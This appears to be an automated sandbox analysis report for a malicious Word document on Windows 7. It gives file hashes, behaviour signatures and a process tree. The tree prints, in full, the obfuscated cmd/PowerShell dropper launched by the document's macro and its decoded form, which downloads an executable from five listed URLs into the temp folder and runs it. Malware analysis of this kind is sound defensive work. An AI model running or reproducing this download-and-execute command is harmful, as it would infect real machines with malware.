Analysis

  • max time kernel
    121s
  • max time network
    163s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    25-11-2022 09:05

General

  • Target

    2d3e0abe9642057ed898507a4fe9f0f665fe3ca1655b5e818bd5fbdd87b313f7.doc

  • Size

    139KB

  • MD5

    1e48ce79696508bbdfab22a36543dc08

  • SHA1

    bc5b0b693fb92ddde3f718dab64efacf0a95ac60

  • SHA256

    2d3e0abe9642057ed898507a4fe9f0f665fe3ca1655b5e818bd5fbdd87b313f7

  • SHA512

    67ed8265be1015e01d57b41e41208518c3ac081bcc791b7010c00cb2423ec166a8a9a35d7b4501a81eeb8b81f66fb20bc7b5bfa8bc3ab2fa8fcd140ab64e8571

  • SSDEEP

    1536:DLh81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadnf+aSzdgY7JM8E2LxUkB:58GhDS0o9zTGOZD6EbzCd+JM8X1B

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2d3e0abe9642057ed898507a4fe9f0f665fe3ca1655b5e818bd5fbdd87b313f7.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:836
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:524
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /V/C"set 1Rh=;'jTt'=Zwo$}}{hctac}};kaerb;'KfJ'=wqV$;nsH$ metI-ekovnI{ )00008 eg- htgnel.)nsH$ metI-teG(( fI;'SXV'=GMB$;)nsH$ ,MvR$(eliFdaolnwoD.Bkp${yrt{)WlV$ ni MvR$(hcaerof;'exe.'+PVH$+'\'+pmet:vne$=nsH$;'DAH'=cWc$;'948' = PVH$;'zaa'=jsr$;)'@'(tilpS.'l1sYnNBwe/se.sedenepoitsegoncet//:ptth@ASMYmjN/moc.tluabmarelc-engapmahc.tenartni//:ptth@wQDqEp4zB/if.notirt//:ptth@tgf3utuF/moc.aiillemac//:ptth@9A2UEUgye/moc.grenut//:ptth'=WlV$;tneilCbeW.teN tcejbo-wen=Bkp$;'uKf'=Msc$ llehsrewop&&for /L %n in (470;-1;0)do set jy=!jy!!1Rh:~%n,1!&&if %n lss 1 echo !jy:*jy!=! |powershell -"
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1800
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo powershell $csM='fKu';$pkB=new-object Net.WebClient;$VlW='http://tunerg.com/eygUEU2A9@http://camelliia.com/Futu3fgt@http://triton.fi/Bz4pEqDQw@http://intranet.champagne-clerambault.com/NjmYMSA@http://tecnogestiopenedes.es/ewBNnYs1l'.Split('@');$rsj='aaz';$HVP = '849';$cWc='HAD';$Hsn=$env:temp+'\'+$HVP+'.exe';foreach($RvM in $VlW){try{$pkB.DownloadFile($RvM, $Hsn);$BMG='VXS';If ((Get-Item $Hsn).length -ge 80000) {Invoke-Item $Hsn;$Vqw='JfK';break;}}catch{}}$owZ='tTj'; "
          3⤵
            PID:1672
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -
            3⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:944
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" =fKu
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1944

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        Filesize

        7KB

        MD5

        92b253f7e626aadc77e7f7b8d74643b2

        SHA1

        c809f90676163e65fb1da8737392ac8ec65ccc74

        SHA256

        f92ddb54e170c865e58d10ca9092762519cfd4c3747efdfafd55d31d59ac2880

        SHA512

        14d163bc2d2f5e4c21f85e97a74d5bf3f72ecb37a8435fbd3e2fab5518d624c381159892ace7910386a0e4810c142b210e90bab011afcb7a10534baa515c6dff

      • memory/524-60-0x000007FEFC3C1000-0x000007FEFC3C3000-memory.dmp
        Filesize

        8KB

      • memory/524-59-0x0000000000000000-mapping.dmp
      • memory/836-57-0x00000000719CD000-0x00000000719D8000-memory.dmp
        Filesize

        44KB

      • memory/836-58-0x00000000759F1000-0x00000000759F3000-memory.dmp
        Filesize

        8KB

      • memory/836-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
        Filesize

        64KB

      • memory/836-55-0x00000000709E1000-0x00000000709E3000-memory.dmp
        Filesize

        8KB

      • memory/836-61-0x00000000006E5000-0x00000000006E9000-memory.dmp
        Filesize

        16KB

      • memory/836-62-0x00000000006E5000-0x00000000006E9000-memory.dmp
        Filesize

        16KB

      • memory/836-78-0x00000000719CD000-0x00000000719D8000-memory.dmp
        Filesize

        44KB

      • memory/836-64-0x00000000719CD000-0x00000000719D8000-memory.dmp
        Filesize

        44KB

      • memory/836-77-0x000000005FFF0000-0x0000000060000000-memory.dmp
        Filesize

        64KB

      • memory/836-54-0x0000000072F61000-0x0000000072F64000-memory.dmp
        Filesize

        12KB

      • memory/944-66-0x0000000000000000-mapping.dmp
      • memory/944-69-0x0000000004C00000-0x0000000005251000-memory.dmp
        Filesize

        6.3MB

      • memory/944-68-0x000000006AC10000-0x000000006B1BB000-memory.dmp
        Filesize

        5.7MB

      • memory/944-74-0x000000006AC10000-0x000000006B1BB000-memory.dmp
        Filesize

        5.7MB

      • memory/944-79-0x000000006AC10000-0x000000006B1BB000-memory.dmp
        Filesize

        5.7MB

      • memory/1672-65-0x0000000000000000-mapping.dmp
      • memory/1800-63-0x0000000000000000-mapping.dmp
      • memory/1944-70-0x0000000000000000-mapping.dmp
      • memory/1944-73-0x000000006AC10000-0x000000006B1BB000-memory.dmp
        Filesize

        5.7MB

      • memory/1944-75-0x0000000004CC0000-0x0000000005311000-memory.dmp
        Filesize

        6.3MB

      • memory/1944-76-0x000000006AC10000-0x000000006B1BB000-memory.dmp
        Filesize

        5.7MB